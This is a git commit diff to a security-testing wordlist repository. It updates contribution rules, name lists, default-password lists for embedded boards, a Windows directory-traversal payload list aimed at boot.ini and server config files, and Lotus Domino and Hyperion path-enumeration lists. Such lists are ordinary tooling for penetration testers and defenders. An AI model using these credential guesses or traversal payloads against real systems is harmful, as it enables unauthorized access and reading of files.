docs: Finish notice file, small changes to wordlists

2025-02-05 23:09:04 +01:00
parent 4eddf72515
commit 19978079bc
35 changed files with 746313 additions and 948800 deletions
--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -31,7 +31,8 @@ Pull requests are the best way to propose changes. We actively welcome your pull
    - There must be **no** empty lines.
    - All wordlists are **lowercase** unless it makes sense, e.g. file names.
    - For wordlists for names, cities, countries, etc. **every word** must be capitalized. (e.g. **J**ohn **C**ena, not John **c**ena or **j**ohn **c**ena)
-3. Issue that pull request!
+3. Make sure to have the source of the wordlist in your pull request. If you made the wordlist yourself, please also mention it so that it is clear.
 4. Issue that pull request!
 ## Commit messages guidelines
--- a/NOTICE.md
+++ b/NOTICE.md
--- a/tools/make_readme.py
+++ b/tools/make_readme.py
@@ -27,6 +27,7 @@ keywords = {
    "Itunes": "iTunes",
    "Xml": "XML",
    "Xss": "XSS",
    "Xxe": "XXE",
 }
 wordlists = {}
--- a/wordlists/languages/danish.txt
+++ b/wordlists/languages/danish.txt
--- a/wordlists/languages/dutch.txt
+++ b/wordlists/languages/dutch.txt
--- a/wordlists/languages/portuguese.txt
+++ b/wordlists/languages/portuguese.txt
--- a/wordlists/languages/ukrainian.txt
+++ b/wordlists/languages/ukrainian.txt
--- a/wordlists/names/top_female_names_canada.txt
+++ b/wordlists/names/top_female_names_canada.txt
@@ -297,4 +297,4 @@ Zelda
 Zoe
 Zoey
 Zora
-Zuri
+Zuri
--- a/wordlists/names/top_male_names_usa.txt
+++ b/wordlists/names/top_male_names_usa.txt
@@ -11,7 +11,6 @@ Adrian
 Agustin
 Ahmad
 Ahmed
 Aiden
 Al
 Alan
 Albert
@@ -112,7 +111,6 @@ Brain
 Branden
 Brandon
 Brant
 Brayden
 Brendan
 Brent
 Brenton
@@ -479,7 +477,6 @@ Jamar
 Jame
 Jamel
 James
 Jameson
 Jamie
 Jan
 Jared
@@ -608,7 +605,6 @@ Leslie
 Lester
 Levi
 Lewis
 Liam
 Lincoln
 Lindsey
 Linwood
--- a/wordlists/passwords/bt4_passwords.txt
+++ b/wordlists/passwords/bt4_passwords.txt
@@ -1,4 +1,3 @@
 00000000
 0000000
 000000
--- a/wordlists/passwords/honeynet.txt
+++ b/wordlists/passwords/honeynet.txt
--- a/wordlists/passwords/password.txt
+++ b/wordlists/passwords/password.txt
--- a/wordlists/passwords/unix_passwords.txt
+++ b/wordlists/passwords/unix_passwords.txt
@@ -5,6 +5,7 @@
 74k&^*nh#$
 123abc
 123qwe
 1234
 010203
 11111
 012345
@@ -189,6 +190,7 @@ bestfriends
 bettyboop
 beyonce
 bhebhe
 bianbu
 bianca
 billabong
 birthday
@@ -334,6 +336,7 @@ darren
 david
 david1
 debbie
 debian
 december
 deedee
 delfin
@@ -585,6 +588,7 @@ lester
 letmein
 liliana
 lilmama
 linaro
 linda
 lindsay
 lindsey
@@ -620,6 +624,7 @@ loveu
 loveya
 loveyou
 loving
 luckfox
 lucky
 lucky1
 lucky7
@@ -685,6 +690,7 @@ midnight
 mierda
 miguel
 milagros
 milkv
 miller
 millie
 minnie
@@ -740,6 +746,7 @@ olivia
 omarion
 onelove
 orange
 orangepi
 orlando
 oscar
 paloma
@@ -806,6 +813,7 @@ qwerty1
 qwertyuiop
 rabbit
 rachel
 radxa
 rafael
 raiders
 rainbow
@@ -823,6 +831,7 @@ richard
 robbie
 robert
 roberto
 rock
 rodrigo
 ronald
 ronaldo
@@ -906,6 +915,7 @@ spongebob
 sporting
 sq!us3r
 stacey
 starfive
 starwars
 steaua
 stella
@@ -940,6 +950,7 @@ teamo
 teddybear
 teiubesc
 tekiero
 temppwd
 tennis
 tequiero
 teresa
@@ -969,6 +980,7 @@ tweety
 twilight
 twinkle
 tyler
 ubuntu
 undertaker
 united
 vagrant
--- a/wordlists/usernames/multiple_sources_users.txt
+++ b/wordlists/usernames/multiple_sources_users.txt
--- a/wordlists/vulnerabilities/apache.txt
+++ b/wordlists/vulnerabilities/apache.txt
--- a/wordlists/vulnerabilities/directory_traversal_win.txt
+++ b/wordlists/vulnerabilities/directory_traversal_win.txt
@@ -844,5 +844,4 @@ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 \\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini
 \\\%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini
 \\\%2e%2e%5c%2e%2e%5cboot.ini
-\\\%2e%2e%5cboot.ini
+\\\%2e%2e%5cboot.ini
 ../../../program%20files%20(x86)/hmailserver/bin/hmailserver.ini
--- a/wordlists/vulnerabilities/domino.txt
+++ b/wordlists/vulnerabilities/domino.txt
@@ -1,4 +1,7 @@
-?Open
+852566C90012664F
 .nsf/../notes.ini
 .nsf/../winnt/win.ini
 ?Open 
 ?OpenServer
 AgentRunner.nsf
 DEASAppDesign.nsf
@@ -12,19 +15,14 @@ DEESAdmin.nsf
 a_domlog.nsf
 account.nsf
 accounts.nsf
 activity.nsf
 adm-bin/acls.exe
 adm-bin/alerts.exe
 adm-bin/console.exe
 adm-bin/listdb.exe
 adm-bin/webstats.exe
 admin4.nsf
 admin5.nsf
 admin.nsf
 adminadm0disk.nsf
 adminadm0plog.nsf
 agentrunner.nsf
-alog4.nsf
+agentrunner.nsf 
 alog.nsf
 archive/a_domlog.nsf
 archive/l_domlog.nsf
@@ -33,22 +31,21 @@ bookmark.nsf
 bookmarks.nsf
 books.nsf
 busytime.nsf
 busytime.nsf 
 calendar.nsf
 catalog.nsf
 catalog.nsf 
 cersvr.nsf
 certa.nsf
 certlog.nsf
 certsrv.nsf
-cgi-bin
+certsrv.nsf 
 cgi-bin/StAdminAct.exe
 cgi-bin/xxxx
 chatlog.nsf
 clbusy.nsf
 cldbdir.nsf
 clusta4.nsf
 collect4.nsf
 cpa.nsf
 cppfbws.nsf
 customerdata
 da.nsf
 database.nsf
@@ -56,13 +53,11 @@ db.nsf
 dba4.nsf
 dbdirman.nsf
 dclf.nsf
 ddm.nsf
 decsadm.nsf
 decsadm.nsf                                       
 decslog.nsf
 default.nsf
 deslog.nsf
 dfc
 dfc/dfc100.nsf
 diiop_ior.txt
 dirassist.nsf
 doc/dspug.nsf
@@ -74,10 +69,12 @@ domadmin.nsf
 domcfg.nsf
 domguide.nsf
 domlog.nsf
-dpicfg.nsf
+domlog.nsf 
 dspug.nsf
 dspug.nsf 
 event.nsf
 events4.nsf
 events4.nsf 
 events5.nsf
 events.nsf
 group.nsf
@@ -89,9 +86,6 @@ help/dols_help.nsf
 help/help5_admin.nsf
 help/help5_client.nsf
 help/help5_designer.nsf
 help/help8_admin.nsf
 help/help8_client.nsf
 help/help8_designer.nsf
 help/help65_admin.nsf
 help/help65_client.nsf
 help/help65_designer.nsf
@@ -103,15 +97,10 @@ help/readme.nsf
 helplt4.nsf
 hidden.nsf
 homepage.nsf
 iNotes
 iNotes/Forms5.nsf
 iNotes/Forms5.nsf/$DefaultNav
 iNotes/Forms6.nsf
 iNotes/Forms7.nsf
 iNotes/Forms8.nsf
 iNotes/help65_iwa_en.nsf
 iNotes/help70_iwa_en.nsf
 iNotes/help80_iwa_en.nsf
 iNotesForms5.nsf
 jotter.nsf
 l_domlog.nsf
@@ -121,13 +110,12 @@ leiadm.nsf
 leilog.nsf
 leivlt.nsf
 lndfr.nsf
 lndsutr.nsf
 log4a.nsf
 log.nsf
 log.nsf 
 loga4.nsf
 lsxlc.nsf
 mab.nsf
 mail
 mail1.box
 mail2.box
 mail3.box
@@ -139,31 +127,29 @@ mail8.box
 mail9.box
 mail10.box
 mail.box
-mail/NOMBRE_USUARIO.nsf
+mail.box 
 mail/admin.nsf
 mail/anotes.nsf
 mail/pxp.nsf
 mail/system.nsf
 mailw46.nsf
 msdwda.nsf
 mtatbls.nsf
 mtstore.nsf
 namagent.nsf
 names.nsf
-nntp
+names.nsf 
 nntp/nd000000.nsf
 nntp/nd000001.nsf
 nntp/nd000002.nsf
 nntp/nd000003.nsf
 nntp/nd000004.nsf
 nntppost.nsf
 nntppost.nsf 
 notes.nsf
 ntsync4.nsf
 ntsync45.nsf
 ntsync45.nsf 
 patrol41.nsf
 perweb.nsf
 private.nsf
 proghelp
 proghelp/KBCCV11.NSF
 proghelp/KBNV11.NSF
 proghelp/KBSSV11.NSF
@@ -171,30 +157,14 @@ public.nsf
 puserinfo.nsf
 qpadmin.nsf
 qstart.nsf
 quickplace
 quickplace/quickplace/main.nsf
-quickplace/quickplacemain.nsf
+quickplacequickplacemain.nsf
 quickstart/qstart50.nsf
 quickstart/wwsample.nsf
 readme.nsf
 reports.nsf
-resource.nsf
+reports.nsf 
-sametime
+resource.nsf 
 sametime/buildinfo.txt
 sametime/hostAddress.xml
 sametime/stadmin
 sametime/stadmin/LoggingError.jsp
 sametime/stadmin/LoggingMeetingDetails.jsp
 sametime/stadmin/LoggingViewSelection.jsp
 sametime/stadmin/LoggingViewTable.jsp
 sametime/stadmin/MonitoringViewGeneralServerStatus.jsp
 sametime/stadmin/MonitoringViewMeetingsAndParticipants.jsp
 sametime/stadmin/MonitoringViewOverview.jsp
 sametime/stadmin/MonitoringViewSelection.jsp
 sametime/stadmin/MonitoringViewToolsInMeetings.jsp
 sametime/stadmin/MonitoringViewTotalLogins.jsp
 sametime/stadmin/StatisticsViewSelection.jsp
 sample
 sample/faqw46.nsf
 sample/framew46.nsf
 sample/pagesw46.nsf
@@ -203,51 +173,15 @@ sample/site1w46.nsf
 sample/site2w46.nsf
 sample/site3w46.nsf
 schema50.nsf
 schema50.nsf 
 schema.nsf
 secret.nsf
 servlet/
 servlet/AccessControlServlet
 servlet/DominoAdminXPathRequestServletJAXP
 servlet/DominoBootstrapServlet
 servlet/DominoConfigurationServlet
 servlet/FileUploadServlet
 servlet/MMAPIServlet
 servlet/MeetingServlet
 servlet/NameChange
 servlet/NameChangeServlet
 servlet/NotesCalendarServlet
 servlet/Policy
 servlet/PolicyServlet
 servlet/RAPFileServlet
 servlet/RefreshServlet
 servlet/SametimeStartupServlet
 servlet/StatisticsServlet
 servlet/TelephonyServlet
 servlet/UserInfoServlet
 servlet/admin
 servlet/auth
 servlet/auth/NameChange
 servlet/auth/Policy
 servlet/auth/admin
 servlet/auth/fileupload
 servlet/auth/mmapi
 servlet/auth/rapfile
 servlet/auth/refresh
 servlet/auth/scs
 servlet/bootstrap
 servlet/fileupload
 servlet/meeting
 servlet/mmapi
 servlet/rapfile
 servlet/refresh
 servlet/scs
 servlet/statistics
 servlet/stcal
 servlet/ststartup
 servlet/telephony
 setup.nsf
 setup.nsf 
 setupweb.nsf
 setupweb.nsf 
 smbcfg.nsf
 smbcfg.nsf 
 smconf.nsf
 smency.nsf
 smhelp.nsf
@@ -262,30 +196,33 @@ smtpobwq.nsf
 smtptbls.nsf
 smvlog.nsf
 software.nsf
-srvnam.htm
+srvnam.htm 
 srvnam.nsf
 stadmin
 statauths.nsf
 statautht.nsf
 statmail.nsf
 statmail.nsf 
 statrep.nsf
 statrep.nsf 
 stauths.nsf
-stautht.nsf
+stautht.nsf 
 stcenter.nsf
 stconf.nsf
 stconf.nsf 
 stconfig.nsf
-stcs.nsf
+stconfig.nsf 
 stdnaset.nsf
 stdnaset.nsf 
 stdomino.nsf
 stlog.nsf
-stnamechange.nsf
+stlog.nsf 
 stpolicy.nsf
 streg.nsf
 stsrc.nsf
 stsrc.nsf 
 test.nsf
 userreg.nsf
 users.nsf
-vpuserinfo.nsf
+vpuserinfo.nsf 
 web.nsf
 web.nsf 
 webadmin.nsf
 welcome.nsf
--- a/wordlists/vulnerabilities/fatwire_pagen_ames.txt
+++ b/wordlists/vulnerabilities/fatwire_pagen_ames.txt
--- a/wordlists/vulnerabilities/front_pages.txt
+++ b/wordlists/vulnerabilities/front_pages.txt
--- a/wordlists/vulnerabilities/hyperion.txt
+++ b/wordlists/vulnerabilities/hyperion.txt
@@ -1,579 +0,0 @@
 /
 HFM/
 HFM/Administration
 HFM/Administration/ManageServersAndApplications.asp
 HFM/Administration/RunningTasks.asp
 HFM/Administration/ShowRunningTaskLog.asp
 HFM/Administration/TaskAudit.asp
 HFM/Administration/TaskAuditExport.asp
 HFM/Administration/TaskProgress.asp
 HFM/Administration/UsersOnSystem.asp
 HFM/Calcman
 HFM/Calcman/convxmltovbs.asp
 HFM/Central
 HFM/Central/Preferences
 HFM/Central/Preferences/DefaultUserPreferences.asp
 HFM/Central/Tasks
 HFM/Central/Tasks/DisplayServers.asp
 HFM/Central/Tasks/SelectApplication.asp
 HFM/Central/Util
 HFM/Central/Util/HFMCentralConstants.asp
 HFM/Central/Util/HTML.asp
 HFM/Central/Util/LaunchHFM.asp
 HFM/Central/Util/ManageApplication.asp
 HFM/Central/Util/VerifyUserOnApplication.asp
 HFM/Common
 HFM/Common/AdminUtility.asp
 HFM/Common/Alerts.asp
 HFM/Common/Async.asp
 HFM/Common/Bottom.asp
 HFM/Common/Calendar.asp
 HFM/Common/CalendarPopup.asp
 HFM/Common/ContextMenuSupport.asp
 HFM/Common/CookieConstants.asp
 HFM/Common/Core.asp
 HFM/Common/Document.Asp
 HFM/Common/Empty.html
 HFM/Common/ErrorDetails.asp
 HFM/Common/ErrorLog.asp
 HFM/Common/FDMIntegrationUtil.asp
 HFM/Common/FileAccess.asp
 HFM/Common/GeneralUI.asp
 HFM/Common/GlobalFunctions.asp
 HFM/Common/HorzNav.asp
 HFM/Common/HsvJSConstantsServer_Common.asp
 HFM/Common/InlineComponentSupport.asp
 HFM/Common/JSClientConstants.asp
 HFM/Common/LogonOpenApp.asp
 HFM/Common/Message.asp
 HFM/Common/MessageDisplayFunctions.asp
 HFM/Common/Metadata.asp
 HFM/Common/MsgBox.Asp
 HFM/Common/NumberStringsJavaScript.asp
 HFM/Common/POVFunctions.asp
 HFM/Common/PopupBanners.asp
 HFM/Common/ProcessManagementConstants.asp
 HFM/Common/ProdNav.asp
 HFM/Common/ReSubmitWithPost.asp
 HFM/Common/Redirect.asp
 HFM/Common/ResourceManager.xslt
 HFM/Common/Resources.xslt
 HFM/Common/RoleIdsToResourceIds.xslt
 HFM/Common/SecurityConstants.asp
 HFM/Common/SecurityOptions.asp
 HFM/Common/StringConstants.asp
 HFM/Common/TabFunctions.asp
 HFM/Common/TaskBoxUI.asp
 HFM/Common/UserPOV.asp
 HFM/Common/Utilities.asp
 HFM/Common/WrkspcFuncs.asp
 HFM/Common/XMLFunctions.asp
 HFM/Common/XMLMetadata.asp
 HFM/Common/XmlSsnState.asp
 HFM/ConsolTemplate
 HFM/ConsolTemplate/ConsolTemplate.asp
 HFM/ConsolTemplate/ProcessTreeConsolTemplate.asp
 HFM/CreateApp
 HFM/CreateApp/CreateApp.asp
 HFM/CreateApp/ProcessCreate.asp
 HFM/Data
 HFM/Data/AsyncPMAlert.asp
 HFM/Data/CellHistory.asp
 HFM/Data/DBManagementClearData.asp
 HFM/Data/DBManagementCopyData.asp
 HFM/Data/DBManagementDeleteInvalidRecords.asp
 HFM/Data/DBManagementObjects.asp
 HFM/Data/DataAudit.asp
 HFM/Data/DataAuditExport.asp
 HFM/Data/DataExplorerCellAdjustments.asp
 HFM/Data/DataExplorerCellInformation.asp
 HFM/Data/DataExplorerCellText.asp
 HFM/Data/DataExplorerGridDefPOVtoMbrSelPOV.xsl
 HFM/Data/DataExplorerGridDefUpgrade.asp
 HFM/Data/DataExplorerGridSettings.asp
 HFM/Data/DataExplorerLineItemDetail.asp
 HFM/Data/DataExplorerManageProcess.asp
 HFM/Data/DataExplorerMbrSel.asp
 HFM/Data/DataExplorerTransactions.asp
 HFM/Data/DataExplorerUnassignedGroups.asp
 HFM/Data/DataExplorerUserPOVSupport.asp
 HFM/Data/DataGridCalcEPU.asp
 HFM/Data/DisplayColumns.asp
 HFM/Data/EntityDetails.asp
 HFM/Data/ExploreData.asp
 HFM/Data/ExploreDataJava.asp
 HFM/Data/FormInstructions.asp
 HFM/Data/FormViewDef.asp
 HFM/Data/HsvJSConstantsServer_Data.asp
 HFM/Data/HsvJSConstantsServer_ProcFlow.asp
 HFM/Data/ImportWDEFFromExcel.asp
 HFM/Data/LineItems.asp
 HFM/Data/MultiPhaseOptions.asp
 HFM/Data/MultiPhaseProcessControlPanelColOptions.asp
 HFM/Data/MultiPhaseProcessControlPanelRowOptions.asp
 HFM/Data/OverlappedConsolidationInfo.asp
 HFM/Data/PhaseOptions.asp
 HFM/Data/PostToAuditIntersectionUrl.asp
 HFM/Data/ProcFlowHistory.asp
 HFM/Data/ProcFlowManagement.asp
 HFM/Data/ProcMgtCalcEPU.asp
 HFM/Data/ProcessControlEmail.xsl
 HFM/Data/ProcessControlMultiPanelFlowManagement.asp
 HFM/Data/ProcessControlPanel.asp
 HFM/Data/ProcessControlPanelCalcSummary.asp
 HFM/Data/ProcessControlPanelFlowManagement.asp
 HFM/Data/ProcessControlPanelMbrSel.asp
 HFM/Data/ProcessControlPanelMulti.asp
 HFM/Data/ProcessControlPanelMultiColOptions.asp
 HFM/Data/ProcessControlPanelMultiMbrSel.asp
 HFM/Data/ProcessControlPanelMultiRowOptions.asp
 HFM/Data/ProcessControlPanelOptions.asp
 HFM/Data/ProcessControlTask.asp
 HFM/Data/ProcessDocMgrSaveWebGrid.asp
 HFM/Data/ProcessEntityDetails.asp
 HFM/Data/ProcessImportWDEFFromExcel.asp
 HFM/Data/ProcessLineItems.asp
 HFM/Data/ProcessProcFlowManagement.asp
 HFM/Data/ProcessSummary.asp
 HFM/Data/ProcessSummaryColOptions.asp
 HFM/Data/ProcessSummaryRowOptions.asp
 HFM/Data/ProcessUserPreferences.asp
 HFM/Data/SubmissionPhase.asp
 HFM/Data/SubmissionPhaseMbrSel.asp
 HFM/Data/Transactions.asp
 HFM/Data/UserPreferences.asp
 HFM/Data/WDEFAddMember.asp
 HFM/Data/WDEFColScript.asp
 HFM/Data/WDEFConstants.asp
 HFM/Data/WdefInterface.asp
 HFM/Data/WebFormBuilder.asp
 HFM/Data/WebFormCellProp.asp
 HFM/Data/WebFormCellText.asp
 HFM/Data/WebFormClientScript.asp
 HFM/Data/WebFormGenerated.asp
 HFM/Data/WebFormLineItems.asp
 HFM/Data/WebFormProcessFDMLaunch.asp
 HFM/Data/XMLDataGrid.asp
 HFM/Data/wdef.xslt
 HFM/Data/wdefExcel.xslt
 HFM/Data/wdef_print.xslt
 HFM/DeleteApp
 HFM/DeleteApp/DeleteApp.asp
 HFM/DeleteApp/DisplayServers.asp
 HFM/DeleteApp/ProcessDelete.asp
 HFM/DocMgr
 HFM/DocMgr/AddToFavorites.asp
 HFM/DocMgr/AddToWorkspace.asp
 HFM/DocMgr/DeleteItems.asp
 HFM/DocMgr/DocMgr.asp
 HFM/DocMgr/DocMgrCommon.asp
 HFM/DocMgr/DocMgrConstants.asp
 HFM/DocMgr/DocMgrDownloadDoc.asp
 HFM/DocMgr/DocMgrSave2.asp
 HFM/DocMgr/DocMgrSave.asp
 HFM/DocMgr/DocMgrSaveGrid.asp
 HFM/DocMgr/DocMgrSaveProcess.asp
 HFM/DocMgr/DownloadItem.asp
 HFM/DocMgr/ExtractItems.asp
 HFM/DocMgr/Favorites.asp
 HFM/DocMgr/FavoritesInclude.asp
 HFM/DocMgr/Link.asp
 HFM/DocMgr/LoadFiles_Add.asp
 HFM/DocMgr/LoadFiles_Add_Process.asp
 HFM/DocMgr/LoadFiles_Process.asp
 HFM/DocMgr/NewFolder.asp
 HFM/DocMgr/NewFolder_Process.asp
 HFM/DocMgr/NewItem.asp
 HFM/DocMgr/OpenItem.asp
 HFM/DocMgr/OpenItemDirect.asp
 HFM/DocMgr/RelatedContent.asp
 HFM/DocMgr/RelatedContentXml.asp
 HFM/DocMgr/TaskList.asp
 HFM/Downloads
 HFM/Downloads/j2re-1_3_1_04-windows-i586-i.exe
 HFM/EIE
 HFM/EIE/AccountCS2HFM.xsl
 HFM/EIE/ApplicationCS2HFM.xsl
 HFM/EIE/CASRedirector.asp
 HFM/EIE/CESAgent.asp
 HFM/EIE/CESMbrSel.asp
 HFM/EIE/CESTask2HFMTask.xslt
 HFM/EIE/Configuration.xsd
 HFM/EIE/ConsolMethodsCS2HFM.xsl
 HFM/EIE/ConsolidationMethod.xsd
 HFM/EIE/Cube.xsd
 HFM/EIE/CurrencyCS2HFM.xsl
 HFM/EIE/CustomCS2HFM.xsl
 HFM/EIE/DataBrokerListener.asp
 HFM/EIE/Dimension4All.xslt
 HFM/EIE/Dimension.xsd
 HFM/EIE/EIEFunctions.asp
 HFM/EIE/EIEListener.asp
 HFM/EIE/EIERedirector.asp
 HFM/EIE/EIERegisterApplication.asp
 HFM/EIE/EntityCS2HFM.xsl
 HFM/EIE/GenericDimCS2HFM.xsl
 HFM/EIE/HFMOfficeProvider.xslt
 HFM/EIE/HfmAwbListener.asp
 HFM/EIE/HubProdNav.asp
 HFM/EIE/ICPCS2HFM.xsl
 HFM/EIE/ManageSmartview.asp
 HFM/EIE/ScenarioCS2HFM.xsl
 HFM/EIE/SmartViewProviderReg.asp
 HFM/EIE/ValueCS2HFM.xsl
 HFM/ExtendedAnalytics
 HFM/ExtendedAnalytics/ExtendedAnalytics.asp
 HFM/FileTransfer
 HFM/FileTransfer/DownloadFile.asp
 HFM/GlobalNav
 HFM/GlobalNav/DefaultGlobalNavContent.asp
 HFM/GlobalNav/GlobalNav.asp
 HFM/GlobalNav/GlobalNavContentSupport.asp
 HFM/GlobalNav/GlobalNavInlineComponents.asp
 HFM/GlobalNav/HFMStaticObjectList.xml
 HFM/GlobalNav/XMLObjectPalette.asp
 HFM/GlobalWorkspaceNav
 HFM/GlobalWorkspaceNav/DefaultGlobalNavContent.asp
 HFM/GlobalWorkspaceNav/GlobalNav.asp
 HFM/GlobalWorkspaceNav/GlobalNavContentSupport.asp
 HFM/GlobalWorkspaceNav/GlobalNavInlineComponents.asp
 HFM/GlobalWorkspaceNav/HFMStaticObjectList.xml
 HFM/GlobalWorkspaceNav/ProcessCloseApp.asp
 HFM/GlobalWorkspaceNav/UserAppPrefs.asp
 HFM/GlobalWorkspaceNav/UserPreferences.asp
 HFM/GlobalWorkspaceNav/XMLObjectPalette.asp
 HFM/GlobalWorkspaceNav/bpm
 HFM/GlobalWorkspaceNav/bpm/conf
 HFM/GlobalWorkspaceNav/bpm/conf/HfmConfig.xml
 HFM/GlobalWorkspaceNav/bpm/modules
 HFM/GlobalWorkspaceNav/bpm/modules/com
 HFM/GlobalWorkspaceNav/bpm/modules/com/hyperion
 HFM/GlobalWorkspaceNav/bpm/modules/com/hyperion/hfm
 HFM/GlobalWorkspaceNav/bpm/modules/com/hyperion/hfm/web
 HFM/GlobalWorkspaceNav/bpm/modules/com/hyperion/hfm/web/appcontainer
 HFM/GlobalWorkspaceNav/bpm/modules/com/hyperion/hfm/web/appcontainer/Adf.asp
 HFM/GlobalWorkspaceNav/bpm/modules/com/hyperion/hfm/web/prefs
 HFM/GlobalWorkspaceNav/bpm/modules/com/hyperion/hfm/web/prefs/Adf.asp
 HFM/GlobalWorkspaceNav/bpm/resources
 HFM/GlobalWorkspaceNav/bpm/resources/da
 HFM/GlobalWorkspaceNav/bpm/resources/de
 HFM/GlobalWorkspaceNav/bpm/resources/en
 HFM/GlobalWorkspaceNav/bpm/resources/es
 HFM/GlobalWorkspaceNav/bpm/resources/fr
 HFM/GlobalWorkspaceNav/bpm/resources/it
 HFM/GlobalWorkspaceNav/bpm/resources/ja
 HFM/GlobalWorkspaceNav/bpm/resources/ko
 HFM/GlobalWorkspaceNav/bpm/resources/ru
 HFM/GlobalWorkspaceNav/bpm/resources/sv
 HFM/GlobalWorkspaceNav/bpm/resources/tr
 HFM/GlobalWorkspaceNav/bpm/resources/zh-CN
 HFM/GlobalWorkspaceNav/bpm/resources/zh-TW
 HFM/HFMOfficeProviderSetup
 HFM/HFMOfficeProviderSetup/HFMOfficeProviderSetup.msi
 HFM/HFMOfficeProviderSetup/LaunchHFMOfficeProviderSetup.vbs
 HFM/HFMOfficeProviderSetup/setup.exe
 HFM/Home
 HFM/Home/AboutHFM.asp
 HFM/Home/AdminHome.asp
 HFM/Home/CustomUI.asp
 HFM/Home/Home.asp
 HFM/Home/LaunchPage.asp
 HFM/Home/MakeDefault.asp
 HFM/Home/MakeDefaultConstants.asp
 HFM/Home/MakeDefaultFunctions.asp
 HFM/Home/NewHome.asp
 HFM/Home/ProductRedirect.asp
 HFM/Home/ProductWindow.asp
 HFM/Home/ReportForward.asp
 HFM/Home/ReportWindow.asp
 HFM/Home/Report_Error.asp
 HFM/Images
 HFM/Images/CROSS01.CUR
 HFM/Images/CROSS02.CUR
 HFM/Images/CROSS03.CUR
 HFM/Images/CROSS04.CUR
 HFM/Images/MAIL.BMP
 HFM/Images/bnr_about.bmp
 HFM/Images/btn_process_1.bmp
 HFM/Images/btn_process_2.bmp
 HFM/Images/btn_process_3.bmp
 HFM/Images/btn_process_4.bmp
 HFM/Images/btn_process_5.bmp
 HFM/Images/horznav_lev0_sel_pic_0.psd
 HFM/Images/journal1.bmp
 HFM/Images/journal2.bmp
 HFM/IntercompanyTransactions
 HFM/IntercompanyTransactions/AsyncIctAlert.asp
 HFM/IntercompanyTransactions/AutoMatch.asp
 HFM/IntercompanyTransactions/DrillDownTransactionReport.asp
 HFM/IntercompanyTransactions/ICAlertOptions.asp
 HFM/IntercompanyTransactions/ICMDrillDownTransactionReport.asp
 HFM/IntercompanyTransactions/ICMonitorDetail.asp
 HFM/IntercompanyTransactions/ICMonitorDetails.xsl
 HFM/IntercompanyTransactions/ICMonitorReport.asp
 HFM/IntercompanyTransactions/ICOpenClosePeriodStatus.asp
 HFM/IntercompanyTransactions/ICOpenClosePeriodStatus.xsl
 HFM/IntercompanyTransactions/ICReports.xsl
 HFM/IntercompanyTransactions/ICTReportProcessor.asp
 HFM/IntercompanyTransactions/ICTransActionStatus.asp
 HFM/IntercompanyTransactions/ICTransColumnFilter.xsl
 HFM/IntercompanyTransactions/ICTransMatchingReportGeneral.asp
 HFM/IntercompanyTransactions/ICTransactionSummary.asp
 HFM/IntercompanyTransactions/ICTransactionsColumnFilter.asp
 HFM/IntercompanyTransactions/ICTransactionsCommon.asp
 HFM/IntercompanyTransactions/LoadTransactions.xsl
 HFM/IntercompanyTransactions/LockUnlockEntities.asp
 HFM/IntercompanyTransactions/LockUnlockEntities.xsl
 HFM/IntercompanyTransactions/LockUnlockEntitiesStatus.asp
 HFM/IntercompanyTransactions/LockUnlockEntitiesStatus.xsl
 HFM/IntercompanyTransactions/ManageICPeriods.asp
 HFM/IntercompanyTransactions/ManageICPeriods.xsl
 HFM/IntercompanyTransactions/ManageReasonCodes.asp
 HFM/IntercompanyTransactions/ManageReasonCodes.xsl
 HFM/IntercompanyTransactions/ManualMatchStatus.asp
 HFM/IntercompanyTransactions/MonitorICTrans.xsl
 HFM/IntercompanyTransactions/MonitorICTransactions.asp
 HFM/IntercompanyTransactions/MultiICTReportProcessor.asp
 HFM/IntercompanyTransactions/NewEditICTransaction.asp
 HFM/IntercompanyTransactions/ProcessICTrans.xsl
 HFM/IntercompanyTransactions/ProcessICTransactions.asp
 HFM/IntercompanyTransactions/ProcessTransAction.xsl
 HFM/IntercompanyTransactions/ReportByAcct.asp
 HFM/IntercompanyTransactions/ReportByID.asp
 HFM/IntercompanyTransactions/ReportHeader.xsl
 HFM/IntercompanyTransactions/ReportSection.xsl
 HFM/IntercompanyTransactions/SetICReasonCodes.asp
 HFM/IntercompanyTransactions/UnmatchICTransactions.asp
 HFM/IntercompanyTransactions/UnmatchICTransactions.xsl
 HFM/IntercompanyTransactions/XslObjects.asp
 HFM/Java
 HFM/Java/classes
 HFM/Java/classes/HFMJavaWebComponents.jar
 HFM/Java/classes/xerces
 HFM/Java/classes/xerces/xercesImpl.jar
 HFM/Java/classes/xerces/xmlParserAPIs.jar
 HFM/Journals
 HFM/Journals/HFM_PrintSingleJournal.xsl
 HFM/Journals/HFM_PrintSingleTemplate.xsl
 HFM/Journals/JournalEntry.asp
 HFM/Journals/Journals2.asp
 HFM/Journals/JournalsAction.asp
 HFM/Journals/JournalsCommon.asp
 HFM/Journals/JournalsDefColumns.asp
 HFM/Journals/JournalsDefFilter.asp
 HFM/Journals/JournalsDefProperties.asp
 HFM/Journals/JournalsMain.asp
 HFM/Journals/JournalsNew.asp
 HFM/Journals/ManageGroups.asp
 HFM/Journals/ManagePeriods.asp
 HFM/Journals/OpenJournal.asp
 HFM/Journals/OpenTemplate.asp
 HFM/Journals/PrintSingleJournal.asp
 HFM/Journals/ProcessFilterGetEntity.asp
 HFM/Journals/ProcessJournalEntry.asp
 HFM/Journals/ProcessJournalsPOV.asp
 HFM/Journals/ProcessJournalsQueryDef.asp
 HFM/Journals/ProcessLIPOVJournals.asp
 HFM/Journals/ProcessManagePeriods.asp
 HFM/Journals/ProcessMbrSelClickMain.asp
 HFM/Journals/ProcessPOVForGeneration.asp
 HFM/Journals/ProcessTemplateEntry.asp
 HFM/Journals/QueryDef.asp
 HFM/Journals/TemplateEntry.asp
 HFM/Journals/TemplatesAction.asp
 HFM/Journals/TemplatesMain.asp
 HFM/Journals/TemplatesNew.asp
 HFM/LoadExtract
 HFM/LoadExtract/ExtractData.asp
 HFM/LoadExtract/ExtractJournals.asp
 HFM/LoadExtract/ExtractMemberLists.asp
 HFM/LoadExtract/ExtractMetaData.asp
 HFM/LoadExtract/ExtractRules.asp
 HFM/LoadExtract/ExtractSecurity.asp
 HFM/LoadExtract/ExtractTransactions.asp
 HFM/LoadExtract/HsvJSConstantsServer_LoadExtract.asp
 HFM/LoadExtract/LoadJournals.asp
 HFM/LoadExtract/LoadMemberLists.asp
